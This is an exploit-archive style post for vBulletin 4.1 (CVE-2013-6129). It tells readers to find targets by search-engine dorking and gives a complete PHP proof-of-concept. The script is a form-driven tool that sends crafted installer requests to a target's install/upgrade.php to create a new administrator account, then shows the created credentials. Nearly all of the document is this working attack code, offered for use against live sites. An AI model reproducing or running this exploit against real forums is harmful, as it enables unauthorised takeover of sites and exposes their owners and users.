=============================================================================================================================================
| # Title     : vBulletin 4.1 create new administrator account Vulnerability                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.vbulletin.com/                                                                                                  |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Vulnerability in vBulletin to create new administrator account.
   
   (Related : https://packetstorm.news/files/id/180859/ Linked CVE numbers: CVE-2013-6129 ) .
	
[+] save code as poc.php.

[+] USage : http://127.0.0.1/poc.php 

[+] PayLoad :

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $username = $_POST["username"];
    $password = $_POST["password"];
    $email = $_POST["email"];
    $target_uri = $_POST["target_uri"];

    if ($username === $password) {
        $message = " يجب أن تكون كلمة المرور مختلفة عن اسم المستخدم!";
    } else {
        // بيانات الطلب
        $post_data = http_build_query([
            'version' => 'install',
            'response' => 'true',
            'checktable' => 'false',
            'firstrun' => 'false',
            'step' => '7',
            'startat' => '0',
            'only' => 'false',
            'options[skiptemplatemerge]' => '0',
            'reponse' => 'yes',
            'htmlsubmit' => '1',
            'htmldata[username]' => $username,
            'htmldata[password]' => $password,
            'htmldata[confirmpassword]' => $password,
            'htmldata[email]' => $email
        ]);

        // تنفيذ الطلب
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $target_uri);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);

        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        // فحص النجاح
        if ($http_code == 200 && strpos($response, "Administrator account created") !== false) {
            $message = " تم إنشاء الحساب بنجاح!<br>اسم المستخدم: <b>$username</b><br>كلمة المرور: <b>$password</b>";
            $alert_class = "alert-success";
        } else {
            $message = " فشل في إنشاء الحساب!";
            $alert_class = "alert-danger";
        }
    }
}
?>

<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>إنشاء حساب مسؤول vBulletin</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
</head>
<body class="bg-light">
    <div class="container mt-5">
        <div class="card shadow-lg">
            <div class="card-header bg-primary text-white text-center">
                <h3>إنشاء حساب مسؤول vBulletin</h3>
            </div>
            <div class="card-body">
                <?php if (!empty($message)) : ?>
                    <div class="alert <?= $alert_class ?? 'alert-warning' ?>"><?= $message ?></div>
                <?php endif; ?>

                <form method="POST">
                    <div class="mb-3">
                        <label class="form-label">رابط vBulletin المستهدف:</label>
                        <input type="text" name="target_uri" class="form-control" required placeholder="مثال: http://target.com/install/upgrade.php">
                    </div>
                    <div class="mb-3">
                        <label class="form-label">اسم المستخدم:</label>
                        <input type="text" name="username" class="form-control" required>
                    </div>
                    <div class="mb-3">
                        <label class="form-label">كلمة المرور:</label>
                        <input type="password" name="password" class="form-control" required>
                    </div>
                    <div class="mb-3">
                        <label class="form-label">البريد الإلكتروني:</label>
                        <input type="email" name="email" class="form-control" required>
                    </div>
                    <button type="submit" class="btn btn-success w-100">إنشاء الحساب</button>
                </form>
            </div>
        </div>
    </div>
</body>
</html>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================